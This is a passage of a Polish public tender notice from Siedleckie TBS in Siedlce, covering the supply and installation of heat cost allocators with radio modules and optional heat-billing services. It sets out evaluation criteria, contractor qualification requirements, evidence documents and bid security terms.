Geodetów 30 okres rozliczeniowy od 1 stycznia do 31 grudnia;<br/>Rozliczenie kosztu ogrzewania na poszczególne lokale nastąpi wg zasad określonych w art. 45a Ustawy Prawo Energetyczne (Dz. U. 1997 nr 54 poz. 348; t.j. Dz. U. z 2021 r. poz. 716, 868.).<br/>W indywidualnym rozliczeniu kosztu centralnego ogrzewania podane będą informacje określone w Rozporządzeniu Ministra Klimatu i Środowiska z dnia 7 grudnia 2021 r. (Dz.U. 2021 poz. 2273) w sprawie warunków ustalania technicznej możliwości i opłacalności zastosowania ciepłomierzy, podzielników kosztów ogrzewania oraz wodomierzy do pomiaru ciepłej wody użytkowej, warunków wyboru metody rozliczania kosztów zakupu ciepła oraz zakresu informacji zawartych w indywidualnych rozliczeniach. Wykonawca zagwarantuje bezpłatne udostępnienie wskazań ciepłomierzy w celu umożliwienia Zamawiającemu przekazanie informacji o wskazaniach najemcy lokalu na jego żądanie. Wykonawca zagwarantuje nieodpłatne udzielenie odpowiedzi na składane reklamacje przez użytkowników lokali.<br/>Szczegółowy opis rozliczenia kosztów ciepła zawiera Opis Przedmiotu Zamówienia – załącznik nr 7 do SWZ oraz projekt umowy – załącznik nr 8 do SWZ.<br/>W trakcie trwania umowy Zamawiający może zmienić metodę rozliczania ciepła. Zmiana metody nastąpi w granicach przedmiotu zamówienia oraz bez zwiększenia maksymalnych limitów i wartości opcji. Zmiana metody nie stanowi istotnej zmiany umowy w rozumieniu art. 455 ustawy Pzp. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2030-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Jedynym kryterium wyboru najkorzystniejszej oferty będzie najniższa cena ryczałtowa brutto dla danej części, podana w formularzu oferty – załącznik nr 1.<br/>2.	Zamawiający będzie oceniał oferty dla każdej części oddzielnie.<br/>3.	Oferty oceniane będą w następujący sposób: <br/><br/>Oferta o najniższej cenie – 100 pkt.<br/>Pozostałe oferty odpowiednio niższe oceny wg wzoru:<br/><br/> cena oferty najniższej x 100<br/>C= ---------------------------------------<br/> cena oferty badanej <br/><br/>C – ilość punktów przyznana ocenianej ofercie w ocenianej części za wykonanie zamówienia.<br/><br/>4.	Za najkorzystniejszą ofertę w każdej części zostanie uznana oferta z najniższą oferowaną ceną brutto, która uzyska najwyższą ilość punktów.<br/>5.	Jeżeli w prowadzonym postępowaniu o udzielenie zamówienia, nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt.<br/>6.	Jeżeli złożono ofertę, której wybór prowadziłby do powstania u zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami. Wykonawca, składając ofertę, informuje zamawiającego, czy wybór oferty będzie prowadzić do powstania u zamawiającego obowiązku podatkowego, wskazując nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania, oraz wskazując ich wartość bez kwoty podatku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa i montaż podzielników kosztów ciepła z modułami radiowymi oraz usługa (na prawach opcji) odczytów i rozliczenia ciepła w budynku komunalnym Miasta Siedlce ul. Daszyńskiego 2a zarządzanym przez Siedleckie Towarzystwo Budownictwa Społecznego Sp. z o.o.<br/><br/>Zakres podstawowy części 3: <br/>termin realizacji - do 15. 12. 2025 r.<br/><br/>Dostawa oraz montaż fabrycznie nowych podzielników kosztów ciepła z modułami radiowymi w ilości 102 szt., w 27 lokalach w budynku przy ul. Daszyńskiego 2a.<br/><br/>Wykaz lokali do wymiany podzielników oraz ich lokalizacja zamieszczone są w tabeli nr 3 Opisu przedmiotu zamówienia – załącznik nr 7 do SWZ,<br/>Dane techniczne cechujące pożądane podzielniki to:<br/>- dopuszczone do stosowania w budownictwie i spełniające wymagania normy PN-EN-834, <br/>- posiadające możliwość dowolnego zaprogramowania daty startu i daty zakończenia okresu rozliczeniowego<br/>- zerujące się po zakończeniu okresu rozliczeniowego<br/>- posiadające możliwość montażu na wszystkich rodzajach grzejników. Podzielnik musi posiadać skalę produktową tzn. musi mieć podczas montażu możliwość zaprogramowania konkretnego typu grzejnika<br/>- wyposażone w wyświetlacz pozwalający na bieżącą kontrolę zużycie ciepła oraz zużycie za poprzedni okres rozliczeniowy<br/>- posiadające pamięć maksymalnej temperatury grzejnika wraz z datą jej wystąpienia<br/>- wyposażone w moduł radiowy umożliwiający zdalny odczyt podzielnika bez konieczności wchodzenia do mieszkania/lokalu<br/>- posiadające możliwość odczytu danych bieżących i danych końcowych oraz z ostatniego okresu rozliczeniowego<br/>- rejestrujące w pamięci próby manipulacji z datą wystąpienia<br/>- posiadające zabezpieczenie przeciw letniemu naliczeniu zużycia<br/>- posiadające możliwość wielokrotnego programowania z uwzględnieniem parametrów grzejnika i współczynnika położenia mieszkania<br/>- posiadające min. 10-letnią gwarancję sprawnego działania.<br/>- Wszystkie zastosowane przez Wykonawcę urządzenia wskaźnikowe winny posiadać zabezpieczenia antymagnetyczne,<br/>Szczegółowy opis dostawy i wymiany podzielników kosztów ciepła zawiera Opis Przedmiotu Zamówienia – załącznik nr 7 do SWZ oraz projekt umowy – załącznik nr 8 do SWZ.<br/><br/>Zakres opcji części 3:<br/>Świadczenie usług zdalnego odczytu podzielników i rozliczenia kosztów ciepła oraz przekazania danych Zamawiającemu, zgodnie z zakresem obowiązków określonym poniżej,<br/>Opcja uruchomiona będzie tylko po uzyskaniu przez Zamawiającego tytułu do zarządzania nieruchomościami Miasta Siedlce po 31.12.2025 r. <br/>Maksymalna wartość opcji – wykonywanie rozliczeń kosztów ciepła od dnia uruchomienia opcji do 31. 12. 2030r., <br/>Maksymalna wartość rozliczeń w ramach prawa opcji wynosi łącznie do 162 rozliczeń, w tym:<br/>  a) do 135 rozliczeń (27 lokali x 1 rozliczenie w roku x 5 lat),<br/>  b) do 27 rozliczeń dodatkowych związanych ze zmianą najemcy lub okresem pustostanu.<br/>Rozliczenia dodatkowe zlecane są na wniosek Zamawiającego w miarę potrzeb i rozliczane według ceny jednostkowej wskazanej w ofercie. Łączna wartość opcji nie przekroczy kwoty wyliczonej w następujący sposób: 162 rozliczenia x cena za 1 rozliczenie.<br/>Dokonanie przystosowania urządzeń i baz danych do odczytów i rozliczeń.<br/>Założenie bazy danych i obliczenie współczynników korekcyjnych grzejnikowych i lokalowych uwzględniających położenie mieszkania i stan techniczny budynku,<br/>Dokonanie odczytu podzielników kosztów ogrzewania - odczyt radiowy bez wchodzenia do lokali,<br/>Okres rozliczeniowy (rok kalendarzowy), pierwszy okres rozliczeniowy od 01.01.2026 do 31.12.2026.<br/>Obliczenie indywidualnych kosztów centralnego ogrzewania jeden raz w roku tj. po upływie 12 miesięcy od daty ostatniego rozliczenia oraz dostarczenie rozliczeń indywidualnych i zbiorczych do siedziby Zamawiającego,<br/>Kontrola prawidłowości działania i mocowania podzielników.<br/>Termin wykonania rozliczeń – do 30 dni od zamknięcia odczytów i otrzymania prawidłowych danych od Zamawiającego.<br/>Wykonawca zagwarantuje bezpłatne udostępnienie wskazań podzielników w celu umożliwienia Zamawiającemu przekazanie informacji o wskazaniach najemcy lokalu na jego żądanie. Wykonawca zagwarantuje nieodpłatne udzielenie odpowiedzi na składane reklamacje przez użytkowników lokali.<br/>Rozliczenie kosztu ogrzewania na poszczególne lokale nastąpi wg zasad określonych w art. 45a Ustawy Prawo Energetyczne (Dz. U. 1997 nr 54 poz. 348; t.j. Dz. U. z 2021 r. poz. 716, 868.).<br/>W indywidualnym rozliczeniu kosztu centralnego ogrzewania podane będą informacje określone w Rozporządzeniu Ministra Klimatu i Środowiska z dnia 7 grudnia 2021 r. (Dz.U. 2021 poz. 2273) w sprawie warunków ustalania technicznej możliwości i opłacalności zastosowania ciepłomierzy, podzielników kosztów ogrzewania oraz wodomierzy do pomiaru ciepłej wody użytkowej, warunków wyboru metody rozliczania kosztów zakupu ciepła oraz zakresu informacji zawartych w indywidualnych rozliczeniach.<br/>Szczegółowy opis zasad rozliczenie kosztów ciepła zawiera Opis Przedmiotu Zamówienia – załącznik nr 7 do SWZ oraz projekt umowy – załącznik nr 8 do SWZ.<br/>W trakcie trwania umowy Zamawiający może zmienić metodę rozliczania ciepła. Zmiana metody nastąpi w granicach przedmiotu zamówienia oraz bez zwiększenia maksymalnych limitów i wartości opcji. Zmiana metody nie stanowi istotnej zmiany umowy w rozumieniu art. 455 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38552000-9 - Mierniki elektroniczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">51210000-7 - Usługi instalowania urządzeń pomiarowych</p> <p class="mb-0">65500000-8 - Odczyty liczników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zakres opcji części 3:<br/>Świadczenie usług zdalnego odczytu podzielników i rozliczenia kosztów ciepła oraz przekazania danych Zamawiającemu, zgodnie z zakresem obowiązków określonym poniżej,<br/>Opcja uruchomiona będzie tylko po uzyskaniu przez Zamawiającego tytułu do zarządzania nieruchomościami Miasta Siedlce po 31.12.2025 r. <br/>Maksymalna wartość opcji – wykonywanie rozliczeń kosztów ciepła od dnia uruchomienia opcji do 31. 12. 2030r., <br/>Maksymalna wartość rozliczeń w ramach prawa opcji wynosi łącznie do 162 rozliczeń, w tym:<br/>  a) do 135 rozliczeń (27 lokali x 1 rozliczenie w roku x 5 lat),<br/>  b) do 27 rozliczeń dodatkowych związanych ze zmianą najemcy lub okresem pustostanu.<br/>Rozliczenia dodatkowe zlecane są na wniosek Zamawiającego w miarę potrzeb i rozliczane według ceny jednostkowej wskazanej w ofercie. Łączna wartość opcji nie przekroczy kwoty wyliczonej w następujący sposób: 162 rozliczenia x cena za 1 rozliczenie.<br/>Dokonanie przystosowania urządzeń i baz danych do odczytów i rozliczeń.<br/>Założenie bazy danych i obliczenie współczynników korekcyjnych grzejnikowych i lokalowych uwzględniających położenie mieszkania i stan techniczny budynku,<br/>Dokonanie odczytu podzielników kosztów ogrzewania - odczyt radiowy bez wchodzenia do lokali,<br/>Okres rozliczeniowy (rok kalendarzowy), pierwszy okres rozliczeniowy od 01.01.2026 do 31.12.2026.<br/>Obliczenie indywidualnych kosztów centralnego ogrzewania jeden raz w roku tj. po upływie 12 miesięcy od daty ostatniego rozliczenia oraz dostarczenie rozliczeń indywidualnych i zbiorczych do siedziby Zamawiającego,<br/>Kontrola prawidłowości działania i mocowania podzielników.<br/>Termin wykonania rozliczeń – do 30 dni od zamknięcia odczytów i otrzymania prawidłowych danych od Zamawiającego.<br/>Wykonawca zagwarantuje bezpłatne udostępnienie wskazań podzielników w celu umożliwienia Zamawiającemu przekazanie informacji o wskazaniach najemcy lokalu na jego żądanie. Wykonawca zagwarantuje nieodpłatne udzielenie odpowiedzi na składane reklamacje przez użytkowników lokali.<br/>Rozliczenie kosztu ogrzewania na poszczególne lokale nastąpi wg zasad określonych w art. 45a Ustawy Prawo Energetyczne (Dz. U. 1997 nr 54 poz. 348; t.j. Dz. U. z 2021 r. poz. 716, 868.).<br/>W indywidualnym rozliczeniu kosztu centralnego ogrzewania podane będą informacje określone w Rozporządzeniu Ministra Klimatu i Środowiska z dnia 7 grudnia 2021 r. (Dz.U. 2021 poz. 2273) w sprawie warunków ustalania technicznej możliwości i opłacalności zastosowania ciepłomierzy, podzielników kosztów ogrzewania oraz wodomierzy do pomiaru ciepłej wody użytkowej, warunków wyboru metody rozliczania kosztów zakupu ciepła oraz zakresu informacji zawartych w indywidualnych rozliczeniach.<br/>Szczegółowy opis zasad rozliczenie kosztów ciepła zawiera Opis Przedmiotu Zamówienia – załącznik nr 7 do SWZ oraz projekt umowy – załącznik nr 8 do SWZ.<br/>W trakcie trwania umowy Zamawiający może zmienić metodę rozliczania ciepła. Zmiana metody nastąpi w granicach przedmiotu zamówienia oraz bez zwiększenia maksymalnych limitów i wartości opcji. Zmiana metody nie stanowi istotnej zmiany umowy w rozumieniu art. 455 ustawy Pzp. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2030-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Jedynym kryterium wyboru najkorzystniejszej oferty będzie najniższa cena ryczałtowa brutto dla danej części, podana w formularzu oferty – załącznik nr 1.<br/>2.	Zamawiający będzie oceniał oferty dla każdej części oddzielnie.<br/>3.	Oferty oceniane będą w następujący sposób: <br/><br/>Oferta o najniższej cenie – 100 pkt.<br/>Pozostałe oferty odpowiednio niższe oceny wg wzoru:<br/><br/> cena oferty najniższej x 100<br/>C= ---------------------------------------<br/> cena oferty badanej <br/><br/>C – ilość punktów przyznana ocenianej ofercie w ocenianej części za wykonanie zamówienia.<br/><br/>4.	Za najkorzystniejszą ofertę w każdej części zostanie uznana oferta z najniższą oferowaną ceną brutto, która uzyska najwyższą ilość punktów.<br/>5.	Jeżeli w prowadzonym postępowaniu o udzielenie zamówienia, nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt.<br/>6.	Jeżeli złożono ofertę, której wybór prowadziłby do powstania u zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami. Wykonawca, składając ofertę, informuje zamawiającego, czy wybór oferty będzie prowadzić do powstania u zamawiającego obowiązku podatkowego, wskazując nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania, oraz wskazując ich wartość bez kwoty podatku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) sytuacji ekonomicznej lub finansowej: <br/>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że: <br/>jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości nie mniejszej niż 100.000,00 złotych; <br/>2) zdolności technicznej lub zawodowej:<br/>Zamawiający stawia warunek dla części 1 i części 2 zamówienia. Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że: w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 zadanie zgodne z przedmiotem zamówienia:<br/>a)	Składając ofertę na część 1 zamówienia – wykaże zadanie obejmujące wykonanie wymiany wodomierzy z modułami radiowymi o wartości min. 100.000,00 zł brutto. <br/>b)	Składając ofertę na część 2 zamówienia – wykaże zadanie obejmujące wykonanie wymiany ciepłomierzy z modułami radiowymi o wartości min. 75.000,00 zł brutto. <br/>c)	Składając ofertę na wszystkie trzy części lub dwie części – wykaże , że wykonał zadania wymagane dla tych części. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia zgodnie z art. 274 Pzp. Zamawiający przed wyborem najkorzystniejszej oferty wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>1)	oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej załącznik nr 2 do SWZ;<br/>2)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności; <br/>3)	zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności ekonomicznej lub finansowej oraz zdolności technicznej lub zawodowej, zamawiający zgodnie z art. 274 Pzp. przed wyborem najkorzystniejszej oferty wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania następujących podmiotowych środków dowodowych:<br/>1) dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia nie mniejszej niż 100.000,00 zł.<br/>2) wykazu robót wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat od daty składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, potwierdzający spełnienie warunku określonego w pkt 2.4 Rozdziału 20 SWZ.<br/>Dokument należy złożyć: <br/>a)	w formie elektronicznej opatrzony kwalifikowanym podpisem elektronicznym lub <br/>b)	w postaci elektronicznej opatrzony podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do reprezentowania Wykonawcy<br/>2)	dowodów określających czy roboty wymienione w Wykazie robót (o którym mowa w punkcie powyżej) zostały wykonane należycie. Dowodami, o których mowa powyżej są: <br/>a)	referencje <br/>b)	inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, <br/>c)	oświadczenie wykonawcy - jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać dokumentów wymienionych w pkt a i b. <br/>Dokument/-y należy złożyć:<br/>− w formie elektronicznej opatrzony kwalifikowanym podpisem elektronicznym podpisem osoby upoważnionej do reprezentowania podmiotu, na rzecz którego dostawy były wykonane – w przypadku gdy dokument został sporządzony w postaci elektronicznej,<br/>− w postaci elektronicznej opatrzony podpisem zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania podmiotu, na rzecz którego dostawy były wykonane,<br/>− w formie cyfrowego odwzorowania tego dokumentu sporządzonego w postaci papierowej poświadczonego kwalifikowanym podpisem elektronicznym, podpisem osobistym lub podpisem zaufanym.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, dokonuje odpowiednio:<br/>− wykonawca,<br/>− wykonawca wspólnie ubiegający się o udzielenie zamówienia,<br/>− podmiot udostępniający zasoby, w zależności od tego, które każdego z nich dotyczą.<br/>− notariusz.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych:<br/>1) Dla części 1 i 2 zamówienia:<br/>a) Atest higieniczny PZH dopuszczający do kontaktu z wodą pitną<br/>b) Deklarację zgodności UE<br/>c) Specyfikację techniczną mierników <br/>2) Dla części 3 zamówienia <br/>a)Dokument potwierdzający spełnianie normy PN-EN 834.<br/>b)Specyfikację techniczną podzielników <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zgodnie z Rozdziałem 21 SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca przystępujący do przetargu na wszystkie części zamówienia zobowiązany jest wnieść wadium w wysokości 4.700,00 zł (słownie: cztery tysiące siedemset zł). <br/>Wykonawca składający ofertę na wykonanie wybranej części robót zobowiązany jest wnieść wadium w wysokości:<br/>a.	część 1 – 3.000,00 zł (słownie: trzy tysiące zł) <br/>b.	część 2 – 1.500,00 zł (słownie: tysiąc pięćset zł)<br/>c. część 3 – 200,00 zł (słownie: dwieście zł)<br/>2.	Wadium powinno obejmować cały okres związania ofertą. <br/>3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. Wadium musi obejmować okres związania ofertą.<br/>4.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r., poz. 310, 836 i 1572).<br/>5.	Wadium w formie pieniężnej należy wnieść na konto Zamawiającego Banku Spółdzielczym w Adamowie O/Siedlce ul. Asza 4, Nr 20 9202 0003 0007 6568 2000 0010 do dnia 6 listopada 2025 r. do godz. 10:00 z dopiskiem „Wadium przetarg na dostawę i wymianę wodomierzy, ciepłomierzy, montaż podzielników z modułami radiowymi oraz usługę (na prawach opcji) odczytów i rozliczenia ciepła w budynkach Miasta Siedlce zarządzanych przez Siedleckie TBS Sp. z o. o. Postępowanie nr STBS.PUZ.P3/2025”<br/>6.	Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>7.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego. <br/>8.	W przypadku wniesienia wadium w formie: <br/>a)	pieniężnej - zaleca się, by dowód dokonania przelewu został dołączony do oferty; <br/>b)	poręczeń lub gwarancji - wymaga się, by oryginał dokumentu został złożony wraz z ofertą.<br/>9.	Wadium wnoszone w formie poręczeń lub gwarancji musi spełniać co najmniej poniższe wymagania: <br/>a)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w Pzp, bez potwierdzania tych okoliczności; <br/>b)	z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium; <br/>c)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie; <br/>d)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>e)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania; <br/>10.	Beneficjentem poręczenia gwarancji jest Siedleckie „TBS” Sp. z o.o.;<br/>11.	Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie odrzucona.<br/>12.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, zgodnie z art. 125 ust. 1 ustawy Pzp, w zakresie określonym we wzorze stanowiącym załącznik nr 3 do SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokument ten potwierdza spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 